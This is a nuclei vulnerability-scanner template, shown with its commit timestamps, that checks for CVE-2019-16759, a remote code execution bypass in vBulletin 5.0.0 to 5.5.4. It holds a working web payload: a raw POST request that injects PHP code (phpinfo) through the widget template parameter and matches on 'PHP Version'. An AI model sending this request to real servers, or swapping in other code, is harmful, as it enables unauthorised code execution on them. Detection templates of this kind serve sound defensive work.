nuclei-templates/cves/CVE-2019-16759-1.yaml

26 lines
598 B
YAML
Raw Normal View History

id: cve-2019-16759-1
2020-08-10 08:32:30 +00:00
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
2020-08-10 09:11:08 +00:00
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
2020-08-10 08:32:30 +00:00
requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
2020-08-10 11:00:34 +00:00
Content-Type: application/x-www-form-urlencoded
2020-08-10 08:32:30 +00:00
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
2020-08-10 09:11:08 +00:00
2020-08-10 08:32:30 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Version"